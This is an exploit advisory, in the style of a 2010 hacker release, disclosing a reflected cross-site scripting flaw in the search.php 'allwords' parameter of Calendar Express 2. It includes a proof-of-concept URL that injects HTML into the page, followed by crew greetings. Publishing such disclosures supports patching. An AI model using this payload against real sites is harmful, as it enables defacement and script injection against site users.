# Exploit Title: Calendar Express 2 Cross Site Scripting Exploit
# Date: January 11th, 2010
# Author: Sora
# Version: 2.0
# Tested on: Windows Vista Home Premium and Linux 2.6.32

----------------------------------------
> Calendar Express 2 XSS Exploit
> Author: Sora
> Contact: vhr95zw [at] hotmail [dot] com
> Website: http://greyhathackers.wordpress.com/

# Vulnerability Description:
Calendar Express 2 suffers a remote cross site scripting exploit in search.php with the parameter "allwords"
due to unsanitized inputs.

# Proof of Concept:
http://server/iwcalendar/search.php?allwords="><H2>Hacked by Sora</h2>&oneword=&cid=3&catid=3

[ Greetz: ]

# Bw0mp # Popc0rn # Revelation # Max Mafiotu # T3eS # Timeb0mb # [H]aruhiSuzumiya # Xermes # Mafia Boyz DZ Crew # &#21407;&#28857; (Origin) # cyber-sec.org # greyhathackers.wordpress.com # incursioexsubter.info #

Be sure to visit cyber-sec.org and greyhathackers.wordpress.com!

[ ------------------ EOF ------------------ ]
________________________________